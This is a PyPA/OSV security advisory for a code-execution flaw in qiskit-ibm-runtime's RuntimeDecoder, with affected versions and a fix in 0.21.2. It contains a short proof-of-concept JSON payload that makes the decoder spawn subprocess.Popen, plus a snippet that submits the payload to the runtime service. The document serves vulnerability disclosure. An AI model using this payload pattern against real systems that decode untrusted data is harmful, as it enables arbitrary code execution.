PYSEC-2026-1858

See a problem?
Import Source
https://github.com/pypa/advisory-database/blob/main/vulns/qiskit-ibm-runtime/PYSEC-2026-1858.yaml
JSON Data
https://api.osv.dev/v1/vulns/PYSEC-2026-1858
Aliases
Published
2026-07-07T11:45:35.805433Z
Modified
2026-07-07T17:48:08.008702852Z
Severity
  • 5.3 (Medium) CVSS_V3 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L CVSS Calculator
Summary
`qiskit_ibm_runtime.RuntimeDecoder` can execute arbitrary code
Details

Summary

deserializing json data using qiskit_ibm_runtime.RuntimeDecoder can be made to execute arbitrary code given a correctly formatted input string

Details

RuntimeDecoder is supposed to be able to deserialize JSON strings containing various special types encoded via RuntimeEncoder. However, one can structure a malicious payload to cause the decoder to spawn a subprocess and execute arbitrary code, exploiting this block of code: https://github.com/Qiskit/qiskit-ibm-runtime/blob/16e90f475e78a9d2ae77daa139ef750cfa84ca82/qiskitibmruntime/utils/json.py#L156-L159

PoC

malicious_data = {
    "__type__": "settings",
    "__module__": "subprocess",
    "__class__": "Popen",
    "__value__": {
        "args": ["echo", "hi"]
    },
}
json_str = json.dumps(malicious_data)

_ = json.loads(json_str, cls=qiskit_ibm_runtime.RuntimeDecoder)  # prints "hi" to the terminal

(where obviously "echo hi" can be replaced with something much more malicious)

notably the following also makes it through the runtime API, with malicious_data serialized client-side via RuntimeEncoder (and therefore presumably deserialized server-side via RuntimeDecoder?)

service = qiskit_ibm_runtime(<ibm_cloud_credentials>)
job = service.run("qasm3-runner", malicious_data)
print(job.status())  # prints "JobStatus.QUEUED"

Impact

i don't know if qiskit_ibm_runtime.RuntimeDecoder is used server-side so this may or may not be a serious vulnerability on your end (however it's definitely a security hole for anyone using the library to deserialize third-party data)

References

Affected packages

PyPI / qiskit-ibm-runtime

Package

Name
qiskit-ibm-runtime
View open source insights on deps.dev
Purl
pkg:pypi/qiskit-ibm-runtime

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0.1.0
Fixed
0.21.2

Affected versions

0.*
0.1.0
0.1.1
0.2.0
0.3.0
0.4.0
0.5.0
0.6.0
0.6.1
0.6.2
0.7.0rc1
0.7.0rc2
0.7.0
0.8.0
0.9.0
0.9.1
0.9.2
0.9.3
0.9.4
0.10.0
0.11.0
0.11.1
0.11.2
0.11.3
0.12.0
0.12.1
0.12.2
0.13.0
0.14.0
0.15.0
0.15.1
0.16.0
0.16.1
0.17.0
0.18.0
0.19.0
0.19.1
0.20.0
0.21.0
0.21.1

Database specific

source
"https://github.com/pypa/advisory-database/blob/main/vulns/qiskit-ibm-runtime/PYSEC-2026-1858.yaml"